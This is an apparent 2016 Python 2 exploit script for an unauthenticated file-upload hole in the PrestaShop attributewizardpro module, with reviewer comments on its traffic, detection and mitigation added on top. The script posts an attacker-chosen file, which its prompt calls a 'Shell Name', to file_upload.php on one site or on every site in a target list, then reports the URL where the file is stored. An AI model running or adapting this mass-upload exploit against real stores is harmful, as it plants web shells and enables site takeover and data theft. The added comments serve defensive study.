#!/usr/bin/python
####################################################################################
#Author  : PentesterDesk
#Date    : 29-June-2016
#Software: Prestashop CMS
#vuln Mod: attributewizardpro
####################################################################################
# Reviewer notes (defensive reading of what this script puts on the wire):
#   * It sends a multipart POST with the form field "userfile" to
#     <site>/modules/attributewizardpro/file_upload.php. The request is built
#     with requests.post(url, files=files) only: no cookies, tokens, credentials
#     or custom headers are attached, so the library's default User-Agent is sent.
#   * The third tuple element is the per-part content type, so the uploaded
#     part is labelled "multipart/form-data" -- an unusual value for a file part
#     and a possible log/WAF signature.
#   * The upload is treated as accepted when the reply is HTTP 200 and echoes the
#     submitted file name. The reply is split on "||||" and its first field is
#     used as the stored name under /modules/attributewizardpro/file_uploads/.
#   * NOTE(review): presumably the endpoint performs no authentication or
#     file-type check -- confirm against the module source; this file shows only
#     the client side.
#   * Triage: look for POSTs to file_upload.php followed by GETs under
#     file_uploads/, and for unexpected files in that directory.
#   * Mitigation: remove or update the module, deny direct web access to
#     file_upload.php, and stop the web server executing scripts in file_uploads/.
#   * Python 2 only (print statements, raw_input). `sys` is imported but not used
#     in the code shown here.
import sys, os
import requests
def main():
        """Show a two-option menu and post a local file to the module's upload endpoint.

        Option 1 asks for one site URL and one file name. Option 2 asks for a text
        file of site URLs (one per line) and one file name, and repeats the same
        POST for every listed site. Results are printed; nothing is returned.
        """
        # The conditional expression binds loosest, so on Windows this evaluates to
        # 'color -a' ('cls' is never run); elsewhere it runs 'clear'.
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
        banner = '''                           +======================================================+                         |    Prestashop  |  FileUpload Exp   |  PentesterDesk  |                         |         Coded by : PentesterDesk Team                |                         |         Contact  : pentesterdesk@gmail.com           |                         +======================================================+                         '''
        print banner
        #/modules/attributewizardpro/
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
        print banner
        print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
        print "[1] Single Site "
        print "[2] Mass Upload"
        ch=raw_input("\n[>] ")
        # Option 1: a single site.
        if ch == '1':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
                print banner
                print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
                url = raw_input("[+] Enter Url  : ")
                filname= raw_input("[+] Enter File : ")
                if filname == '' or url == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        # Re-enters the menu; there is no return afterwards, so control
                        # continues below once the nested call finishes.
                        main()
                # Endpoint path is appended to whatever base URL was typed in.
                url = url + "/modules/attributewizardpro/file_upload.php"#main
                # Form field "userfile": (file name, file object, per-part content type).
                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                req=requests.post(url,files=files)
                final =[]
                # Reply fields are separated by "||||"; the first one is used below
                # as the stored file name.
                final = (req.text).split("||||")
                # Acceptance test: HTTP 200 and the submitted name echoed in the body.
                if req.status_code == 200 and filname in req.text:
                        # Location under file_uploads/ that is reported for the stored file.
                        url=url.replace('/file_upload.php','/file_uploads/'+final[0])
                        print ("[+] %s [ok]" % (url))
                else:
                        print "\n[+] %s [no]\n" %url
                        raw_input("\n[+] Press Enter [>] ")
        # Option 2: the same request repeated for every site in a list file.
        if ch == '2':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
                print banner
                print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
                filee = raw_input("[+] Enter List  Name : ")
                filname= raw_input("[+] Enter Shell Name : ")
                if filname == '' or filee == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        # Same re-entry as in option 1; no return follows it.
                        main()
                ob = open(filee,'r')
                lists = ob.readlines()
                list1 = []
                i = 0
                # Only the trailing '\n' is stripped from each list entry.
                for i in range(len(lists)):
                        list1.append(lists[i].strip('\n'))
                count = 0
                for site in (list1):
                        count = count + 1
                        url = site + "/modules/attributewizardpro/file_upload.php"
                        # The local file is reopened for each site.
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        final =[]
                        final = (req.text).split("||||")
                        # Same acceptance test and file_uploads/ path as in option 1.
                        if req.status_code == 200 and filname in req.text:
                                url=url.replace('/file_upload.php','/file_uploads/'+final[0])
                                print ("[%d] %s [ ok ]" % (count,url))
                        else:
                                print ("[%d]  %s [ No ]" % (count,url))
if __name__ == "__main__":
    main()